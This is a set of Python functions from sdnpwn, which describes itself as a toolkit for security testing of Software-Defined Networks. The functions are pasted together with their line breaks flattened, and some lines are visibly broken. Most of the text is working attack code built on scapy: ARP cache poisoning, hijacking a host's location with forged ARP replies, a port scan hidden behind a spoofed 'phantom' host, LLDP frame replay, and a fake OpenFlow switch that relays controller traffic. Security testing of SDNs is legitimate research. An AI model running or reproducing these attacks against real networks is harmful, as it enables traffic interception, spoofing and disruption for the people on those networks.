def arpCachePoison(interface, vicIP, vicMAC, targetIP, newMac, thisHostIP, thisHostMAC, loop, loopDelay): global poisoningComplete global haltPoisoning poisoningComplete = False haltPoisoning = False sdnpwn.message("Sending gratuitous ARP for legitimate host to " + vicIP, sdnpwn.NORMAL) sendp( Ether(src=thisHostMAC, dst=vicMAC) / ARP(hwsrc=thisHostMAC, pdst=thisHostIP)) sleep( 2 ) #Need to wait to ensure that the flow has been installed on the switches sdnpwn.message("Poisoning target " + vicIP, sdnpwn.NORMAL) malARP = (Ether(src=thisHostMAC, dst=vicMAC) / ARP(op=ARP.is_at, psrc=targetIP, hwsrc=newMac, pdst=targetIP)) if (loop == True): while (haltPoisoning == False): sendp(malARP) sleep(loopDelay) poisoningComplete = True else: sendp(malARP) poisoningComplete = True
def handleFlowMod(device, header, body, verbose): if(verbose): print("Got FlowMod") flowMod = FlowMod() flowMod.unpack(body) flow = Flow(match=flowMod.match, cookie=flowMod.cookie, idle_timeout=flowMod.idle_timeout, hard_timeout=flowMod.hard_timeout, priority=flowMod.priority, buffer_id=flowMod.buffer_id, out_port=flowMod.out_port, flags=flowMod.flags, actions=flowMod.actions ) if(flowMod.command == FlowModCommand.OFPFC_ADD): sdnpwn.message("Adding New Flow ", sdnpwn.NORMAL) device.switch_flows[str(flow.cookie)] = flow elif(flowMod.command == FlowModCommand.OFPFC_MODIFY): sdnpwn.message("Modifying Flow ", sdnpwn.NORMAL) device.switch_flows[str(flow.cookie)] = flow elif(flowMod.command == FlowModCommand.OFPFC_MODIFY_STRICT): sdnpwn.message("Modifying Flow (Strict) ", sdnpwn.NORMAL) device.switch_flows[str(flow.cookie)] = flow elif(flowMod.command == FlowModCommand.OFPFC_DELETE): sdnpwn.message("Deleting Flow ", sdnpwn.NORMAL) if(flow.cookie == 0): device.switch_flows = {} else: del device.switch_flows[str(flow.cookie)] elif(flowMod.command == FlowModCommand.OFPFC_DELETE_STRICT): sdnpwn.message("Deleting Flow (Strict) ", sdnpwn.NORMAL) if(flow.cookie == 0): device.switch_flows = {} else: del device.switch_flows[str(flow.cookie)] print(flow.toString())
def prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC): global scanPrepped global poisoningThread sdnpwn.message("Inserting entery for Phantom Host in target ARP cache...", sdnpwn.NORMAL) sdnpwn.message( "Sending SYN from Phantom (" + phantomIP + ") to " + targetIP, sdnpwn.NORMAL) sendTCPSYN(interface, targetIP, targetMAC, getUniqueNum(), phantomIP, thisHostMAC, getUniqueNum(), getUniqueNum()) sdnpwn.message("Waiting for ARP request for Phantom (" + phantomIP + ")", sdnpwn.NORMAL) sniff(iface=interface, filter="arp and host " + targetIP, store=0, count=1) sdnpwn.message("Done. IP should be in cache", sdnpwn.SUCCESS) scanPrepped = True try: if (poisoningThread == None): poisoningThread = Thread(target=dpap.arpCachePoison, args=(interface, targetIP, targetMAC, phantomIP, phantomMAC, thisHostIP, thisHostMAC, True, 2)).start() except Exception as e: sdnpwn.message("Issue starting poisoning thread", sdnpwn.ERROR) print(e) exit(0)
def run(params): global poisoningComplete global haltPoisoning poisoningComplete = False haltPoisoning = False signal.signal(signal.SIGINT, signal_handler) iface = sdnpwn.getArg(["--iface", "-i"], params) vIP = sdnpwn.getArg(["--victim", "-v"], params) vMac = sdnpwn.getArg(["--victim-mac", "-vM"], params) targetIP = sdnpwn.getArg(["--target-ip", "-t"], params) newMac = sdnpwn.getArg(["--mac", "-m"], params) loop = sdnpwn.checkArg(["--loop", "-l"], params) loopDelay = sdnpwn.getArg(["--delay", "-d"], params, 1) if (vMac == None): vMac = sdnpwn.getTargetMacAddress(iface, vIP) if (vIP == None or vMac == None or targetIP == None or newMac == None): print(info()) print(usage()) return thisHostIP = sdnpwn.getIPAddress(iface) thisHostMAC = sdnpwn.getMacAddress(iface) if ((thisHostIP == '0') or (thisHostMAC == '0')): sdnpwn.message("Invalid interface", sdnpwn.ERROR) return arpCachePoison(iface, vIP, vMac, targetIP, newMac, thisHostIP, thisHostMAC, loop, loopDelay)
def signal_handler(signal, frame): global runningThreads sdnpwn.message("Stopping...", sdnpwn.NORMAL) dpap.stopPoisoning() while (dpap.isPoisoningComplete() != True): pass runningThreads.remove(runningThreads[1]) runningThreads.remove(runningThreads[0])
def hijackHostLocation(iface, ip, vicMac): if(vicMac == ""): sdnpwn.message("Could not get MAC address for host " + ip, sdnpwn.ERROR) return False malARP = (Ether(src=vicMac, dst="FF:FF:FF:FF:FF:FF")/ARP(op=ARP.is_at, psrc=ip, hwsrc=vicMac, pdst=ip)) sendp(malARP) return True
def run(params): sdnpwn.message("Module template created!", sdnpwn.SUCCESS) sdnpwn.message("Module template created!", sdnpwn.WARNING) sdnpwn.message("Module template created!", sdnpwn.ERROR) sdnpwn.message("Module template created!", sdnpwn.NORMAL) sdnpwn.message("Module template created!", sdnpwn.VERBOSE) print("Params are:") print(params) signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
def signal_handler(signal, frame): #Handle Ctrl+C here print("") sdnpwn.message("Stopping...Try Ctrl+C once more", sdnpwn.NORMAL) try: stopListening = True for s in socks: s.close() except: pass exit(0)
def run(params): if (len(params) > 1): params.pop(0) try: call(params) except: com.message("Problem executing command. May require Root.", com.ERROR) return else: print(info()) print(usage())
def run(params): global haltHijackHostLocation haltHijackHostLocation = False signal.signal(signal.SIGINT, signal_handler) iface = "" target = "" loop = False loopDelay = 1 if ("--iface" in params): iface = params[params.index("--iface") + 1] if ("--target" in params): target = params[params.index("--target") + 1] if ("--loop" in params): loop = True if ("--delay" in params): loopDelay = params[params.index("--delay") + 1] targets = [] if (target == ""): print(info()) print(usage()) return else: thisHostIP = sdnpwn.getIPAddress(iface) startIndex = 0 endIndex = 1 if ("/" in target): targets = ip_network(target) startIndex = 1 endIndex = targets.num_addresses - 2 else: targets = ip_network(str(target) + "/32") for host in range(startIndex, endIndex): targetHost = targets[host].exploded vicMac = sdnpwn.getTargetMacAddress(iface, targetHost) sdnpwn.message( "Hijacking location of host " + targetHost + " (" + vicMac + ")", sdnpwn.NORMAL) if (loop == True): while (haltHijackHostLocation is not True): hijackHostLocation(iface, thisHostIP, vicMac) sleep(loopDelay) else: hijackHostLocation(iface, thisHostIP, vicMac)
def getPorts(port): if (port == None): sdnpwn.message("No ports given, using 6633,6634, and 6653.", sdnpwn.NORMAL) ports = [6633, 6634, 6653] elif ("," in port): ports = port.split(",") elif ("-" in port): ports = [] for p in range(int(port.split("-")[0]), int(port.split("-")[1]) + 1): ports.append(p) else: ports.append(port) return ports
def run(params): intf = sdnpwn.getArg(["--iface", "-i"], params) mode = sdnpwn.getArg(["--mode", "-m"], params) if ((mode != None) and (intf != None)): pktHandler = packetHandler() pktHandler.mode = mode sdnpwn.message("Starting sniffer on interface " + intf + "\n", sdnpwn.NORMAL) signal.signal(signal.SIGINT, signal_handler) sniff(iface=intf, prn=pktHandler.packetIn) else: print(info()) print(usage())
def run(params): if (len(params) == 1): com.message("No module name given!", com.ERROR) else: #try: params.pop(0) for m in params: try: m = m.replace("-", "_") mod = imp.load_source(m, "modules/" + m + ".py") com.message("Module Name: " + m, com.NORMAL) com.message("Description: " +, com.NORMAL) com.message("Usage:", com.NORMAL) print(mod.usage()) except IOError: com.message("Module " + m + " does not exist!", com.ERROR)
def scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC, targetPort): global scanPrepped if (scanPrepped == None or scanPrepped == False): prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC) sourcePort = getUniqueNum() tcpSeqNum = getUniqueNum() sniffingThread = Thread(target=listen, args=(interface, targetIP, targetMAC, targetPort, phantomIP, sourcePort, tcpSeqNum)).start() sleep(1) sdnpwn.message("Checking Port " + targetPort, sdnpwn.NORMAL) sendTCPSYN(interface, targetIP, targetMAC, targetPort, phantomIP, thisHostMAC, sourcePort, tcpSeqNum)
def run(params): if (len(params) == 1 or "-l" in params): printModules(None) if ("-n" in params): try: templateName = "module_base_template" newModName = params[params.index("-n") + 1] if (newModName in getModuleList()): sdnpwn.message("Module already exists!", sdnpwn.WARNING) return if ("-t" in params): templateName = params[params.index("-t") + 1][ "cp", "modules/" + templateName.replace("-", "_") + ".py", "modules/" + newModName.replace("-", "_") + ".py" ]) except: sdnpwn.message("Could not create new module", sdnpwn.ERROR) if ("-s" in params): try: searchString = params[params.index("-s") + 1] printModules(searchString) except: sdnpwn.message("Error searching for module", sdnpwn.ERROR) if ("-r" in params): try: moduleName = params[params.index("-r") + 1] confirm = input("Are you sure you would like to remove '" + moduleName + "'? [y/n]: ") if (confirm == "y"): os.remove("modules/" + moduleName.replace("-", "_") + ".py") try: os.remove("modules/" + moduleName.replace("-", "_") + ".pyc") except: pass sdnpwn.message("Module '" + moduleName + "' removed.", sdnpwn.WARNING) except Exception as e: sdnpwn.message("Error removing module", sdnpwn.ERROR) print(e)
def printModules(searchString): if (searchString is None): sdnpwn.message("Available modules:", sdnpwn.SUCCESS) for m in getModuleList(): sdnpwn.message("" + (m.split(".py")[0]).replace("_", "-"), sdnpwn.NORMAL) else: sdnpwn.message("Available modules (Matching '" + searchString + "'):", sdnpwn.SUCCESS) for m in getModuleList(): if (searchString in m): sdnpwn.message("" + (m.split(".py")[0]).replace("_", "-"), sdnpwn.NORMAL)
def handlePacketOut(device, header, body, verbose): if(verbose): print("Got PacketOut") packetOut = PacketOut() packetOut.unpack(body) tempFlow = Flow() try: pkt = Ether( if(verbose): print(Flow.actionsToString(actions)) if(device.forward_packet_out_payload == True): if(device.forward_packet_out_port_filter is not None): if(("Port " + str(device.forward_packet_out_port_filter)) in tempFlow.actionsToString(packetOut.actions)): sendp(pkt, iface=device.forward_packet_out_iface) else: sendp(pkt, iface=device.forward_packet_out_iface) except Exception as e: sdnpwn.message("Got error handling packet out.", sdnpwn.WARNING) sdnpwn.message(str(e), sdnpwn.VERBOSE)
def activateRelaySocket(port): global ofSwitch hostname = socket.gethostbyname(socket.gethostname()) listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listenSock.bind(("", port)) listenSock.listen(1) data = b'' sdnpwn.message("[Relay Socket] Relay port open on port " + str(port) + "", sdnpwn.NORMAL) while 1: try: conn, addr = listenSock.accept() msgHeader = conn.recv(8) header = Header() header.unpack(msgHeader) sdnpwn.message( "[Relay Socket] Got " + str(header.message_type) + " from " + str(addr), sdnpwn.NORMAL) msgBody = conn.recv(header.length - 8) msgFull = header.pack() + msgBody print(msgFull) ofSwitch.comm_sock.send(msgFull) except Exception as e: sdnpwn.message("[Relay socket] Error handling message", sdnpwn.WARNING) print(e) listenSock.close()
def run(params): signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler iface = sdnpwn.getArg(["--iface", "-i"], params) count = sdnpwn.getArg(["--count", "-c"], params, 1) if (sdnpwn.checkArg(["--capture", "-w"], params)): outFile = sdnpwn.getArg(["--capture", "-w"], params) frameHandler = FrameHandler(iface, outFile) sdnpwn.message("Starting listener on interface " + iface, sdnpwn.NORMAL) sniff(iface=iface, store=0, prn=frameHandler.handler, count=1, filter="ether proto 0x88cc") sdnpwn.message("LLDP frame saved to " + outFile, sdnpwn.SUCCESS) elif (sdnpwn.checkArg(["--replay", "-r"], params)): inFile = sdnpwn.getArg(["--replay", "-r"], params) pkt = rdpcap(inFile) for c in range(int(count)): sendp(pkt, iface=iface) sdnpwn.message("Replayed " + inFile + " " + str(count) + " times", sdnpwn.SUCCESS)
def main(): if (len(sys.argv) == 1): try: mod = imp.load_source("help", "modules/") params = sys.argv.pop(0) filter(None, params) del mod except IOError: com.message("Error importing " + modName + " as a module.", com.ERROR) elif (len(sys.argv) > 1): modName = sys.argv[1] modName = modName.replace("-", "_") params = sys.argv filter(None, params) params.pop(0) try: mod = imp.load_source(modName, "modules/" + modName + ".py") del sys.modules[modName] except IOError as e: if (e == errno.EPERM): com.message("Run as root!", com.ERROR) except ImportError as e: com.message("Error importing " + modName + " as a module.", com.ERROR) print(e)
def run(params): cmd = "" prompt = "$" #Check for root and change prompt if user has root if (os.geteuid() == 0): prompt = "#" else: com.message("Root not detected. Some modules may be limited.", com.WARNING) while (cmd != "exit"): signal.signal(signal.SIGINT, signal_handler) cmd = input("\033[1msdnpwn" + prompt + " \033[0m") if (cmd == "exit"): com.message("Bye", com.NORMAL) exit(0) elif (cmd != ""): params = cmd.split(" ") cmd = params[0] cmd = cmd.replace("-", "_") try: mod = imp.load_source(cmd, "modules/" + cmd + ".py") filter(None, params) del sys.modules[cmd] imp.reload(signal) imp.reload(com) except InterruptedError as e: print("Module interupted.") except IOError as e: if (e == errno.EPERM): com.message("Run as root!", com.ERROR) else: com.message("Error importing " + cmd + " as a module.", com.ERROR) print(e) except Exception as e: com.message("Something went wrong!", com.ERROR) print(e)
def loadConfiguration(self, config): self.switch_vendor_id = config["vendor_id"] self.switch_desc["switch_mfr_desc"] = config["description"]["manufacturer_description"] self.switch_desc["switch_hw_desc"] = config["description"]["hardware_description"] self.switch_desc["switch_sw_desc"] = config["description"]["software_description"] self.switch_desc["switch_serial_num"] = config["description"]["serial_number"] self.switch_desc["switch_dp_desc"] = config["description"]["dataplane_description"] self.switch_features["dpid"] = config["features"]["dataplane_id"] self.switch_features["no_of_buffers"] = config["features"]["number_of_buffers"] self.switch_features["no_of_tables"] = config["features"]["number_of_tables"] self.switch_features["capabilities"] = config["features"]["capabilities"] self.switch_features["actions"] = config["features"]["actions"] self.switch_features["ports"] = [] if(isinstance(config["ports"], list)): for port in config["ports"]: self.addPort(port["port_no"], port["hardware_address"], port["port_name"], port["port_config"], port["port_state"], port["port_curr"], port["port_advertised"], port["port_supported"], port["port_peer"]) #Need to add config options here elif(isinstance(config["ports"], int)): for i in range(config["ports"]): self.addPort() else: sdnpwn.message("Could not load port config. Switch will have no ports.", sdnpwn.WARNING) self.switch_stats["flow"] = config["stats"]["flow_stats"]
def testForSDN(testMethod, dstIP, count, interval): global verbose rtt = [] sentMS = 0 if (testMethod == "icmp"): sdnpwn.message("Testing with ICMP", sdnpwn.NORMAL) icmp = (IP(dst=dstIP) / ICMP()) for i in range(0, count): sentMS = int(round(time.time() * 1000)) resp = sr1(icmp) rtt.append((int(round(time.time() * 1000))) - sentMS) time.sleep(interval) elif (testMethod == "arp"): sdnpwn.message("Testing with ARP", sdnpwn.NORMAL) for i in range(0, count): sentMS = int(round(time.time() * 1000)) resp = arping(dstIP) rtt.append((int(round(time.time() * 1000))) - sentMS) time.sleep(interval) initValue = rtt[0] rtt.pop(0) #Perform T-Test to check if first latency value is significantly different from others in our sample res = stats.ttest_1samp(rtt, initValue) if (verbose == True): sdnpwn.message("Initial RTT: " + str(initValue), sdnpwn.VERBOSE) sdnpwn.message("RTTs for other traffic: " + str(rtt), sdnpwn.VERBOSE) sdnpwn.message("Calculated p-value for inital RTT is " + str(res[1]), sdnpwn.VERBOSE) if ( res[1] < .05 and all(i < initValue for i in rtt) ): #If the p-value is less that 5% we can say that initValue is significant return True else: return False
def run(params): global ofSwitch verbose = False signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler controllerIP = sdnpwn.getArg(["--controller", "-c"], params, "") controllerPort = sdnpwn.getArg(["--port", "-p"], params, 6633) configFile = sdnpwn.getArg(["--config", "-r"], params) packetOutForwardingIFace = sdnpwn.getArg(["--output-to", "-o"], params) packetOutForwardingFilter = sdnpwn.getArg(["--output-filter", "-f"], params) if (sdnpwn.checkArg(["--listen", "-l"], params)): rsPort = sdnpwn.getArg(["--listen", "-l"], params) rsThread = threading.Thread(target=activateRelaySocket, args=(int(rsPort), )) rsThread.setDaemon(True) rsThread.start() verbose = sdnpwn.checkArg(["--verbose" "-v"], params) if (configFile == ""): sdnpwn.message( "Please provide a switch configuration file using the --config option", sdnpwn.ERROR) return configRaw = open(configFile, 'r') config = "" try: config = json.load(configRaw) except Exception as e: sdnpwn.message( "Could not read config as JSON file. Please check syntax.", sdnpwn.ERROR) sdnpwn.message(e, sdnpwn.VERBOSE) config = config["of-switch"] ofSwitch = of.OpenFlowSwitch() ofSwitch.loadConfiguration(config) ofSwitch.auto_handle_Messages = True ofSwitch.enable_output = verbose if (packetOutForwardingIFace is not None): ofSwitch.forward_packet_out_payload = True ofSwitch.forward_packet_out_iface = packetOutForwardingIFace if (packetOutForwardingFilter is not None): ofSwitch.forward_packet_out_port_filter = packetOutForwardingFilter ofSwitch.connect(controllerIP, int(controllerPort))
def packetHandler( pkt): #This is the function scapy will use as the callback if (TCP in pkt): if (pkt[IP].src == targetIP and pkt[TCP].dport == sourcePort): flags = getFlags(pkt[TCP].flags) if (flags == "SA"): sdnpwn.message("Port " + targetPort + " open", sdnpwn.SUCCESS) elif (flags == "RA"): sdnpwn.message("Port " + targetPort + " closed", sdnpwn.ERROR) else: sdnpwn.message( "Got flags " + flags + " for port " + targetPort, sdnpwn.WARNING) return
def signal_handler(signal, frame): print("") com.message("Bye", com.NORMAL) sys.exit(0)
def signal_handler(signal, frame): #Handle Ctrl+C here print("") sdnpwn.message("Stopping...", sdnpwn.NORMAL) return
def run(params): print("") print("") print(''' _ | | ___ __| |_ __ _ ____ ___ __ / __|/ _` | '_ \| '_ \ \ /\ / / '_ \ \__ \ (_| | | | | |_) \ V V /| | | | |___/\__,_|_| |_| .__/ \_/\_/ |_| |_| | | |_| ''') print("Author: Dylan Smyth") print("Site:") print("Version: 1.7.0 ") print("") sdnpwn.message(" What is sdnpwn? ", sdnpwn.SUCCESS) print( "sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs)." ) print("") sdnpwn.message("Usage", sdnpwn.SUCCESS) print( '''Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module. Modules can be executed like so: ./ <module name> <module options> The mods module can be used to list all available modules: ./ mods More information about a certain module can be accessed using the info module: ./ info mods The above command would retrieve more information about the mods module, such as a description and available options.''' ) print("") sdnpwn.message("Creating and managing modules", sdnpwn.SUCCESS) print( '''Many sdnpwn modules use functionality from other modules. Each sdnpwn module is a Python module in itself so modules can be imported and functionality accessed. New modules can be created using the following command: ./ mods -n <new module name> Running the above command will create a new sdnpwn module from a template. Modules can be removed with the following command: ./ mods -r <module name>''') print("") sdnpwn.message("Further Information", sdnpwn.SUCCESS) print( "Check out for articles and tutorials on using various sdnpwn modules and the attacks they use." ) print("") signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
def run(params): signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler appDir = sdnpwn.getArg(["-b", "--build"], params, None) doConfig = sdnpwn.checkArg(["-c", "--configure"], params) if(appDir == None): sdnpwn.message("No app directory specified", sdnpwn.ERROR) return if(doConfig): try: with open(appDir + "/sdnpwn_options", 'r+') as confFile: #confFile = open(appDir + "/sdnpwn_options", 'r+') confOut = "" for l in confFile.readlines(): conf = l.split("=") confVal = input(conf[0] + " [" + conf[1].replace("\n","") + "]: ") or conf[1].replace("\n","") confOut += conf[0] + "=" + confVal + "\n" confFile.write(confOut) except Exception as e: sdnpwn.printWarning("Error while setting configuration!") print(e) return sdnpwn.printNormal("Building " + appDir) buildDir = appDir + "-building-temp" try: shutil.copytree(appDir, buildDir) config= {} with open(buildDir + "/sdnpwn_options", 'r') as confFile: for l in confFile.readlines(): conf = l.split("=") config[conf[0]] = conf[1].replace("\n","") sdnpwn.printNormal("Got configuration") with open(buildDir + "/pom.xml", 'r+') as pomFile: pomFileData = for k in config.keys(): pomFileData = pomFileData.replace(k, config[k]) pomFile.write(pomFileData) javaFilesLocation = buildDir + "/src/main/java/org/onosproject/app/" javaFiles = [f for f in listdir(javaFilesLocation) if isfile(join(javaFilesLocation, f))] for j in javaFiles: #with open(javaFilesLocation + j, 'r+') as javaFile: #javaFileData = #Above method won't overwrite the whole file for some reason. Should check out why. javaFile = open(javaFilesLocation + j, 'r') javaFileData = javaFile.close() for k in config.keys(): javaFileData = javaFileData.replace(k, config[k]) javaFile = open(javaFilesLocation + j, 'w') javaFile.write(javaFileData) javaFile.close() sdnpwn.printSuccess("Files updated with configuration") sdnpwn.printNormal("Compiling app with maven") call(['mvn', '-f', buildDir, 'clean', 'install']) shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.oar", "apps/compiled_apps/") shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.jar", "apps/compiled_apps/") sdnpwn.printSuccess("OAR and JAR file moved to apps/compiled_apps") if(sdnpwn.checkArg(["-k", "--keep-source"], params)): shutil.copytree(buildDir, appDir + "-" + str(" ")[0]) sdnpwn.printNormal("App source saved in " + appDir + "-" + str(" ")[0]) except Exception as e: sdnpwn.printError("Error building " + appDir) print(e) finally: shutil.rmtree(buildDir)
def run(params): global scanPrepped scanPrepped = False conf.verb = 0 #Set scapy verbose mode off signal.signal(signal.SIGINT, signal_handler) interface = None targetIP = None targetMAC = None targetPort = None phantomIP = None phantomMAC = None if ("--iface" in params): interface = params[params.index("--iface") + 1] if ("--target-ip" in params): targetIP = params[params.index("--target-ip") + 1] if ("--target-mac" in params): targetMAC = params[params.index("--target-mac") + 1] if ("--ports" in params): targetPort = params[params.index("--ports") + 1] if ("--phantom-ip" in params): phantomIP = params[params.index("--phantom-ip") + 1] if ("--phantom-mac" in params): phantomMAC = params[params.index("--phantom-mac") + 1] if (interface == None or targetIP == None or targetPort == None or phantomIP == None): print(info()) print(usage()) return if (targetMAC == None): sdnpwn.message("Sending ARP request for target MAC", sdnpwn.NORMAL) targetMAC = sdnpwn.getTargetMacAddress(interface, targetIP) sdnpwn.message("Got target MAC: " + targetMAC, sdnpwn.NORMAL) if (phantomMAC == None): phantomMAC = sdnpwn.generateRandomMacAddress() sdnpwn.message("Generated Phantom host MAC: " + phantomMAC, sdnpwn.NORMAL) targetPorts = targetPort.split(",") sourcePort = getUniqueNum() tcpSeqNum = getUniqueNum() thisHostIP = sdnpwn.getIPAddress(interface) thisHostMAC = sdnpwn.getMacAddress(interface) if ((thisHostIP == '0') or (thisHostMAC == '0')): sdnpwn.message("Invalid interface", sdnpwn.ERROR) exit(0) prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC) while (dpap.isPoisoningComplete() == False): sleep(2) sdnpwn.message("Waiting for poisoning to complete...", sdnpwn.NORMAL) sdnpwn.message("Starting port scan", sdnpwn.SUCCESS) for p in targetPorts: scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC, p) sleep(2) sdnpwn.message("Finishing up...", sdnpwn.NORMAL) dpap.stopPoisoning() return